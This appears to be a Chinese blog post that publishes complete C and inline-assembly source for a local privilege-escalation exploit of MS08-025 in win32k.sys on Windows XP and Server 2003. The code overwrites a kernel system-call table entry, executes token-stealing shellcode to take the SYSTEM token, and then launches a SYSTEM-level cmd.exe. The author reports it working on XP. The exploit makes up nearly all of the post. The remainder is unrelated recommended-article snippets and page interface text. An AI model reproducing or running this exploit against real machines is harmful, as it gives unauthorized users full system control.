MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

最新推荐文章于 2024-06-19 11:43:49 发布
原创 最新推荐文章于 2024-06-19 11:43:49 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#system #null #token #callback #cmd #search

本文介绍了一种针对Windows XP SP2环境下MS08-025漏洞的提权方法,通过利用win32k.sys中的NtUserFnOUTSTRING函数实现权限提升,并展示了具体的shellcode实现过程。
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一种利用方式,通过覆盖SSDTNtVdmControl的地址进行shellcode的执行

#include <stdio.h>
#include <windows.h>

typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,
                                       PVOID            *BaseAddress,
                                       ULONG                ZeroBits,
                                       PULONG           RegionSize,
                                       ULONG                AllocationType,
                                       ULONG                Protect );
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
    printf("%s:%x/n", msg, GetLastError());
    ExitProcess(0);
}
ZWVDMCONTROL    ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;

_declspec(naked) int ShellCode()
{

      if ( OsVersionInfo.dwMinorVersion == 1 ) {

       __asm {

               nop
               nop
               nop
               nop
               nop
               nop

               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
               Mov eax,[eax]

               mov esi,[eax+0x220]
               mov eax,esi

searchXp:

               mov eax,[eax+0x88]
               sub eax,0x88
               mov edx,[eax+0x84]
               cmp edx,0x4 // Find System Process
               jne searchXp

               mov eax,[eax+0xc8] // 获取system进程的 token
               mov [esi+0xc8],eax // 修改当前进程的 token

               ret 8

       }
   }
   if ( OsVersionInfo.dwMinorVersion == 2 ) {

       __asm {

           nop
               nop
               nop
               nop
               nop
               nop

               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
               Mov eax,[eax]

               mov esi,[eax+0x220]
               mov eax,esi

search2003:

               mov eax,[eax+0x98]
               sub eax,0x98
               mov edx,[eax+0x94]
                cmp edx,0x4 // Find System Process
               jne search2003

               mov eax,[eax+0xd8] // 获取system进程的 token
               mov [esi+0xd8],eax // 修改当前进程的 token
               ret 8

       }
   }


}

void InitTrampoline()
{

   PNTALLOCATE NtAllocateVirtualMemory;
   LPVOID       addr = (LPVOID)3;
   DWORD       dwShellSize=0x1000;
   unsigned char trampoline[]="/x68/x00/x00/x00/x00" //push 0x0
                               "/xc3";               // retn

   NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");

   if( !NtAllocateVirtualMemory )
       exit(0);

   NtAllocateVirtualMemory(   (HANDLE)-1,
                               &addr,
                               0,
                               &dwShellSize,
                               MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                               PAGE_EXECUTE_READWRITE );

   if( (PULONG)addr )
   {
       printf("/n[++] Error Allocating memory/n");
       exit(0);
   }


   *(PULONG*)(trampoline+1)=(PULONG)ShellCode;
   memcpy(NULL,trampoline,sizeof(trampoline)-1);
}
int Callback_Overview()
{
   printf("/n");
   printf("=====================================================================   /n");
   printf("/t/tMicrosoft Windows XP SP2 - MS08-025 -       /n");
   printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit   /n");
   printf("=====================================================================   /n");
   printf("+ References:/n");
   printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx/n");
   printf(" http://hi.baidu.com/vessial/n/n");
   return 1;
}

void GetFunction()
{
    HANDLE    hNtdll,hNtos;
   
    hNtdll = LoadLibrary("ntdll.dll");
    if(hNtdll == NULL)
        ErrorQuit("LoadLibrary failed./n");
       
    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
    if(ZwVdmControl == NULL)
        ErrorQuit("GetProcAddress failed./n");
              
    FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{

   //PULONG   PntVdmControl=0x805F0DB0;
    char*   PntVdmControl=0x80502460; // 通过*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4获得
   
    
   STARTUPINFOA                stStartup;
   PROCESS_INFORMATION            pi;


   Callback_Overview();
   GetFunction();
   RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
   OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
   GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

   if ( OsVersionInfo.dwMajorVersion != 5 ) {

       printf( "Not NT5 system/n" );
       ExitProcess( 0 );
   }
   //Get Operatiny System Version
       
   InitTrampoline();

   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
   printf("/n[+] Executing Shellcode.../n");

   ZwVdmControl(0, NULL);
   GetStartupInfo( &stStartup );

   CreateProcess( NULL,
       "cmd.exe",
       NULL,
       NULL,
       TRUE,
       NULL,
       NULL,
       NULL,
       &stStartup,
       &pi );   // 此时创建的cmd.exeSYSTEM权限

  
   printf("[+] Exiting.../n");

   return TRUE;
}
 我在XP测试成功,下面的第一个cmdSYSTEM权限,这是我们提权后的,一个cmdtest权限



 
iiprogram
关注
HTB academy --- Windows Privilege Escalation --- Dealing with End of Life Systems
g9999g的博客
02-23 1056
昨天返校没发文章,而且被靶机的破环境折磨死了,原先可以用的连接方式都不好用,只能用那条命令连接,而且还只能在ps界面执行,要不然就会一直报错,本来没啥难度被这恶心了好久,还有从今天开始进行更新,明天就该结束window提权模块,下一个模块是域控方面的还望大家多多支持。
红队专题-与维持隐匿Privilege Escalation
aming小老弟
10-27 2034
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit2
06-12 876
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行#include #include typedef LONG NTSTATUS;typedef NTSTATUS (NT
MS Windows GDI Local Privilege Escalation Exploit
04-11 1156
#define _WIN32_WINNT 0x0500#i nclude #i nclude #i nclude #pragma comment (lib, "user32.lib")#pragma comment (lib, "gdi32.lib")#pragma comment (lib, "shlwapi.lib")#pragma comment (lib, "ntdll.lib")/*He
2019最有意思的五大 ZDI 案例之:通过调色板索引实现 Win32k.sys 本地提权漏洞(上)...
smellycat000的专栏
12-18 773
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队本文是趋势科技 ZDI 项目推出的第二届年度最有意思的五大案例系列文章之一。他们从1000多份安全公告中遴选出这些案例,奇安...
MS08-025通过覆盖SSDT表进行执行shellcode
04-16 1054
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行#include #include typedef LONG NTSTATUS;typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE    
51-52Windows密码安全性测试与Windows提权
XLbb的博客
06-19 1560
2、kali的【ophcrack】工具彩虹表hash暴力破解。
Hackthebox:Optimum Walkthrough(not use metasploit)
汗的博客
12-06 643
信息收集 nmap 10.10.10.8 发现只开了一个80端口的http 浏览器打开 google可知HFS的含义是Http File Server,可以上传文件,页面也显示HttpFileServer 2.3 查找相关漏洞 searchsploit HFS -----------------------------------------------------------------------------------------------------------------------------
kali安装xlrd指定版本
qq_43691308的博客
01-28 1322
kali中安装xlrd库 1、sudo apt-get install python-setuptools 2、 python -m easy_install xlrd 最近由于xlrd更新了版本,导致windows-exploit-suggester.py使用时报错 oot@kali:~/Desktop/suggester# python windows-exploit-suggester.py --database ms.xlsx --systeminfo test.txt [*] initiati
BP神经网络+PID控制Simulink仿真
11-26
提供了基于BP(Back Propagation)神经网络结合PID(比例-积分-微分)控制策略的Simulink仿真模型。该模型旨在实现对杨艺所著论文《基于S函数的BP神经网络PID控制器及Simulink仿真》中的理论进行实践验证。在Matlab 2016b环境下开发,经过测试,确保能够正常运行,适合学习和研究神经网络在控制系统中的应用。 特点 集成BP神经网络:模型中集成了BP神经网络用于提升PID控制器的性能,使之能更好地适应复杂控制环境。 PID控制优化:利用神经网络的自学习能力,对传统的PID控制算法进行了智能调整,提高控制精度和稳定性。 S函数应用:展示了如何在Simulink中通过S函数嵌入MATLAB代码,实现BP神经网络的定制化逻辑。 兼容性说明:虽然开发于Matlab 2016b,但理论上兼容后续版本,可能会需要调整少量配置以适配不同版本的Matlab。 使用指南 环境要求:确保你的电脑上安装有Matlab 2016b或更高版本。 模型加载: 下载本仓库到本地。 在Matlab中打开.slx文件。 运行仿真: 调整模型参数前,请先熟悉各模块功能和输入输出设置。 运行整个模型,观察控制效果。 参数调整: 用户可以自由调节神经网络的层数、节点数以及PID控制器的参数,探索不同的控制性能。 学习和修改: 通过阅读模型中的注释和查阅相关文献,加深对BP神经网络与PID控制结合的理解。 如需修改S函数内的MATLAB代码,建议有一定的MATLAB编程基础。
sketch_nov26a_anjian.zip
11-26
sketch_nov26a_anjian.zip
Python控制,分支,猜数字游戏
11-26
Python控制,分支,猜数字游戏
44页-非接触新经济安全治理报告(赛博&安恒信息)(1).pdf
11-26
44页-非接触新经济安全治理报告(赛博&安恒信息)(1)
AIR-AP2800-K9-ME-8-10-196-0.zip 2800和3800 Mobile Express
11-26
Description : Cisco 2800 & 3800 Series Mobility Express Release 8.10 Software. Access Point image bundle, to be used for software update and/or supported access points images. Release : 8.10.196.0 Release Date : 13-May-2024 FileName : AIR-AP2800-K9-ME-8-10-196-0.zip & AIR-AP3800-K9-ME-8-10-196-0.zip Size : 502.40 MB ( 526809432 bytes) MD5 Checksum : 2bc8cb0f124d7535742119de89fb5ead SHA512 Checksum : cc25cbeaa043da2122d460bc8b518913bddf76a36516e96a5fdaa74580be6ae335b565ed1b14a1e930d759150bc39ecad0f565859412b00d832f749a73dce7f7
13页-数据安全合规产品白皮(星环科技2023)(1).pdf
11-26
13页-数据安全合规产品白皮(星环科技2023)(1)
33页-中国个人信息出境标准合同白皮书(闪捷信息&盈科律所 2023).pdf
11-26
33页-中国个人信息出境标准合同白皮书(闪捷信息&盈科律所 2023)
【配电网重构】高比例清洁能源接入下计及需求响应的配电网重构【IEEE33节点】(Matlab代码实现)
最新发布
11-26
【配电网重构】高比例清洁能源接入下计及需求响应的配电网重构【IEEE33节点】(Matlab代码实现)内容概要:本文介绍了在高比例清洁能源接入背景下,结合需求响应机制的配电网重构方法,并以IEEE33节点系统为例进行Matlab代码实现。研究通过优化网络拓扑结构,降低网损、改善电压质量,同时利用需求响应灵活调节负荷,提升配电网运行的经济性与稳定性,有效应对清洁能源出力波动带来的挑战。文中详细阐述了模型构建、目标函数设计、约束条件及求解流程,为智能配电网优化提供了可复现的技术方案。; 适合人群:电力系统、电气工程及相关专业的研究生、科研人员以及从事配电网优化、新能源接入等领域工作的工程师。; 使用场景及目标:①应用于含高比例风电、光伏等分布式电源的配电网优化运行;②支撑需求响应机制下的电网调度决策;③作为IEEE33节点标准系统的仿真案例,服务于教学、科研与项目开发中的算法验证与性能测试。; 阅读建议:建议读者结合提供的Matlab代码,深入理解配电网重构的数学模型与求解过程,重点关注目标函数与约束条件的设置逻辑,并可通过修改参数或引入其他优化算法进行拓展研究,以提升实际应用能力。
libncurses.so.5(NCURSES_5.0.19991023)(64bit) 被 smutool-1.1.1-1.nfs.x86_64需求
03-25
好的,我现在需要解决用户提到的关于smutool-1.1.1-1.nfs.x86_64对libncurses.so.5(NCURSES_5.0.19991023)(64bit)的...: 参考 Linux 权限提升基础 https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值